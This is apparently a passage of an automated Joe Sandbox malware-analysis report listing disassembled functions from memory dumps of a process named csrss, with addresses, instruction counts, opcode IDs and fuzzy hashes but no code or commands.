                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 6a1efb1da7b0d52b46fd3742112398c65a92dc3c01ef87487a52ce76d9acd590
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: A1F05E30D0C5474FEA58BA1894406B933D1FF49394F514575E85EE32D7DF38BC524688
                                                      Function 00007FF848E69302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: e632629a13c288fd40e49167fc9eed5a3bc03506c75983479b4ffe746cb3388f
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: 8CE01531A189098FEB94FBA8D4456E8B3A1FF48351F1000B6D00ED7692CA24A8118B44
                                                      Function 00007FF848E83459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f57d29265651e36853527e4a66c41391508d8cbfef4a2d168007f093ad7f1d5
                                                      • Instruction ID: 005d4197d2efd80e39390d411697df2a860af41cc7756798f8296d7273db1cfe
                                                      • Opcode Fuzzy Hash: 9f57d29265651e36853527e4a66c41391508d8cbfef4a2d168007f093ad7f1d5
                                                      • Instruction Fuzzy Hash: 92E0922060ABC84FC70EA63848685607FB1EB7711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848E8D969 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 369a34f16f6ef5f9b6f321a989fca502e6984126a83cfcbd20b969cf08aa95b5
                                                      • Instruction ID: 117d398a96bb739c59f9276ad66b5cb833d5a23d66dc7938b8128c3a9732a1ca
                                                      • Opcode Fuzzy Hash: 369a34f16f6ef5f9b6f321a989fca502e6984126a83cfcbd20b969cf08aa95b5
                                                      • Instruction Fuzzy Hash: 0CE04F21A4E7C44FC30A56348C699543FB1DF67215B4A41DBC485CF2B3D65EDC89C711
                                                      Function 00007FF848E8D8E9 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c96f83e07883fca753af22bc1c99dfc7d095508ff2e51b5cff882e8c949a1ec3
                                                      • Instruction ID: f23fcfcf4f1ba179b4cf74755830096687b2a8b6908daba8fab384b4cb7187fb
                                                      • Opcode Fuzzy Hash: c96f83e07883fca753af22bc1c99dfc7d095508ff2e51b5cff882e8c949a1ec3
                                                      • Instruction Fuzzy Hash: 1DE01A21A4E7C44FC30A56348C699543FA19F67215B4A41DBC485CF2B3D65A9C88C712
                                                      Function 00007FF848E87C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1863e0135fde105c643c66801ba6d299cb992c1fe72685f9c8c81fe690a48548
                                                      • Instruction ID: ad8391b58df22416d08d03738914130b86940a99b47bce2f728dfc30279a68ef
                                                      • Opcode Fuzzy Hash: 1863e0135fde105c643c66801ba6d299cb992c1fe72685f9c8c81fe690a48548
                                                      • Instruction Fuzzy Hash: 2EE012349897804FC70A573488658943FB0DF57211B4640EBD045CB1B3D61D984DC752
                                                      Function 00007FF848E65178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: d5028e84253b0d08a6a134b6bbb6af139556f03019dce6de6b23f8f8d7412ad3
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: FBD0A730B6090D4B8B0CB63D8458430F3D1F7AA2167D452BDD40BC3285ED25ECC6CB84
                                                      Function 00007FF848E65100 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction ID: 9828fb9e976b1d65435d8dabbe81c7c1e7bc6e36ce387b6031f85f7e1d1903ea
                                                      • Opcode Fuzzy Hash: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction Fuzzy Hash: B5D05E30B609094B9B0CB62D8459430F3D1F7AA60A7D452B8940BC2291ED25ECC68B84
                                                      Function 00007FF848E8A900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E8A870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E8D029 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34b8e3ea634f446c3d897b34ff3bd2a6a8139acf7a8d005df5f22a0c98f8862c
                                                      • Instruction ID: 10f524f0dca0d28fee402b598e142b12a94044ac128e2a79d09c81a72022d1f2
                                                      • Opcode Fuzzy Hash: 34b8e3ea634f446c3d897b34ff3bd2a6a8139acf7a8d005df5f22a0c98f8862c
                                                      • Instruction Fuzzy Hash: 02E0B62150AB894FC70A972488A9A547FB0AF27215B8A01D7C445CF5B3E6599C89C752
                                                      Function 00007FF848E53824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: d1dd959e7b57275dca3ebafa1f10b66655cb34e914f7fb7f55f90a0168c7f07f
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: 61E012A4D0C11A4FF754F694C8517F9A251BF94384F1005B4E51E936D2CF786D804649
                                                      Function 00007FF848E89239 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 291d45b292907fb58fa62b6a6ed09ff3b14795a4d511b50f839b8bba071c7ec0
                                                      • Instruction ID: dd73a5b8cf500617412a86cabecf1ed37bc76cc0ff9a90a025e7957af8b8110b
                                                      • Opcode Fuzzy Hash: 291d45b292907fb58fa62b6a6ed09ff3b14795a4d511b50f839b8bba071c7ec0
                                                      • Instruction Fuzzy Hash: 3EE0E23190A7844FC70AAB2488A99813FB0EE2B211B8A01C7D045CB5B3EA598C89C752
                                                      Function 00007FF848E82290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848E871D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 62ee331e2131f12d8d4a861df0e1569bac33b85c170829c5c870963bcad2b80d
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 71D01234B549044FC70CB6398C99C747391EB6E216BD540ADD00AD73B1DA6ADC89C741
                                                      Function 00007FF848E8BB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: bab30f638dfe59913a3a1a34d25a52fc4db2b6a141b435c38ac4625086238978
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: ADD01234B549084FC70CB6389859C7473A1EB6A216BD540A9D00AC72B1DA6ADC89C741
                                                      Function 00007FF848E892CA Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7583ff0582966e50bc530f950074e16ba5bb1eaa60e435a70a55e9b43244206b
                                                      • Instruction ID: 7a162dc6d11a31f33b9efcb3a54740b0d468f17ba9fbb6b80036b3370ff7bfa7
                                                      • Opcode Fuzzy Hash: 7583ff0582966e50bc530f950074e16ba5bb1eaa60e435a70a55e9b43244206b
                                                      • Instruction Fuzzy Hash: F3D0123050994C4FC70DE734C9ACE507BE0EB2B205F8500D9D809CF1B2E6599DC8C741
                                                      Function 00007FF848E885F8 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction ID: 62ddd4f34b88b609de501658909eba08af2d6d18e809ae8cc5977cf97666aad6
                                                      • Opcode Fuzzy Hash: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction Fuzzy Hash: D2C08C309548088FCB4CFB28C898C64B3E0FB69311BC100A8D00FC71B0EA6A9C88CB81
                                                      Function 00007FF848E51953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60594505e154fd153eb55de89e446081378d440bf6601f50435af8e364861b92
                                                      • Instruction ID: dad38bef9b7e11a61a08f700313e0825c69f9b6278c6bc93e45d7cb15363dd6f
                                                      • Opcode Fuzzy Hash: 60594505e154fd153eb55de89e446081378d440bf6601f50435af8e364861b92
                                                      • Instruction Fuzzy Hash: EED05EA191CA4A4EEB91BBF0841A2BAD692BF10740F084478E84E971C3CF7D34005A84
                                                      Function 00007FF848E506AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: 317fbeaa422082a68fdb26ae8ecd20c90428908bff5ea4f41069e549f5fd909f
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4AC08C80D0F50B08E45035EF54020BDE2007FC46A4FD00032E20C40081AEAD20C5014E
                                                      Function 00007FF848E5559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 386bf0d55b311f36094d8c9c4e9fa44af07b03fc9579fd2f4dfe6a75e6a81a19
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 89D0C7E5C1D5238FFA7134D448141BA8345BB50375F154771D42D361C19FBDBD414519
                                                      Function 00007FF848E512D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 951b53101753b080a765cf62695390f57fb955e6d07ca6465aed65b9a5a0b96a
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: F0C08C305118088FC908FB28C88480477A0FB09200BC20090E008C7170D269DCC0C740
                                                      Function 00007FF848E54E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5354ca1e4d97e8b175d3421f4e252a6bfd2193449b09c1fba15575a35560373f
                                                      • Instruction ID: 0cac30775b63f9d478f132e9db755c5941d17dba0fd4bc5d4c4537ce5ee73404
                                                      • Opcode Fuzzy Hash: 5354ca1e4d97e8b175d3421f4e252a6bfd2193449b09c1fba15575a35560373f
                                                      • Instruction Fuzzy Hash: 8DC08C05E0DC9A9AE256620440222BE80829F80B88F4401B5E00E863CACF0C1D01028A
                                                      Function 00007FF848E506D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 28315593817b17fe14230b521667c5a77be4b0c62c4bb6215b01c95ed2707653
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: BEB01240C5E40F04E41431FB08420B4F0407FC4144FC00070E40C40185AA5D1094024A

                                                      Non-executed Functions

                                                      Function 00007FF848E509B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction ID: a3a522484715945d4e2b20b52116875a4ff3ea2099a8acd90016f2f80befa4f0
                                                      • Opcode Fuzzy Hash: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction Fuzzy Hash: A55137D6ACE8627DE11D36FDB4415FD6B48EF852B8F0C9677E04C890838E1860858AFD

                                                      Executed Functions

                                                      Function 00007FF848E80D48 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: 7954a2ccd3bec6ce1b394b68ccb81ac0a10f3edeabab4aecbe2cee74ac318104
                                                      • Instruction ID: 7d885b03197a155addafa691fdf02628e5ac22471701e7db53eb67a7916ece34
                                                      • Opcode Fuzzy Hash: 7954a2ccd3bec6ce1b394b68ccb81ac0a10f3edeabab4aecbe2cee74ac318104
                                                      • Instruction Fuzzy Hash: 3C91A071A1DA8D9FD74AEF2888653AD7FE1FB56350F4401BAC00AD72D2DB791804C715
                                                      Function 00007FF848E914BB Relevance: .8, Instructions: 775COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9819921a17f8012979ef72bd2fdc9f5aee5eb08af80b37c272de5fdab04cd3b3
                                                      • Instruction ID: 80c8e56ee4326d0706ada1b730bfaf7fd73986ce5336e9dc01795f69f4e11b90
                                                      • Opcode Fuzzy Hash: 9819921a17f8012979ef72bd2fdc9f5aee5eb08af80b37c272de5fdab04cd3b3
                                                      • Instruction Fuzzy Hash: D132B521E1CD5A9FE798FA6884516B873A2FF94784F5445B9C00EC32C7DF39AC828785
                                                      Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fe23d081ba241968f2273bf834ca2b0705322f99a2ba0127589aded92ab88c9
                                                      • Instruction ID: f99913804452ac11e6b0014657422362535b405bd9f23a53e0f771a15d33b162
                                                      • Opcode Fuzzy Hash: 0fe23d081ba241968f2273bf834ca2b0705322f99a2ba0127589aded92ab88c9
                                                      • Instruction Fuzzy Hash: E351BFB1A19A4D8EE399AF1888657ADBFE0FB96350F4402BEC00AD36D1DB792451C714
                                                      Function 00007FF848EB38ED Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: 7fb1629bba09bb6a922d1ed7f402aaa7028be9e11c818a3006485fc51e568d87
                                                      • Instruction ID: 1686ca88b206031c9c51a15a9f2ec2585043543cdf3677cf41b482f4ca40a6c9
                                                      • Opcode Fuzzy Hash: 7fb1629bba09bb6a922d1ed7f402aaa7028be9e11c818a3006485fc51e568d87
                                                      • Instruction Fuzzy Hash: 9A81A231E1C98A5FEB98FA2C885627973D2FF64781F0441B9D40EC72C7DE78A8418789
                                                      Function 00007FF848EB3943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: 72840464b93b8452900a54b1c8a27b935a6cd4ebc24fce223c7ecd5e9db4b43e
                                                      • Instruction ID: 3c99bb45ac95b96f492fc172d34def30aee57b77997df1c146ec82dcd3fed2c6
                                                      • Opcode Fuzzy Hash: 72840464b93b8452900a54b1c8a27b935a6cd4ebc24fce223c7ecd5e9db4b43e
                                                      • Instruction Fuzzy Hash: F9518F21E1C94E5FEB98FA2C84562B973D2FFA4781F448579D40EC72C7DE38A8418385
                                                      Function 00007FF848E939F9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction ID: 538681e39e8b4deb11982b87fcc777e952730e097e27c8c5ef8cd1d695503f26
                                                      • Opcode Fuzzy Hash: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction Fuzzy Hash: 7FF09B7190E7C44FC71AEA3488694547FA0EF6721174A51EEC045CF1A3DA2DDC45C701
                                                      Function 00007FF848EBA8E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
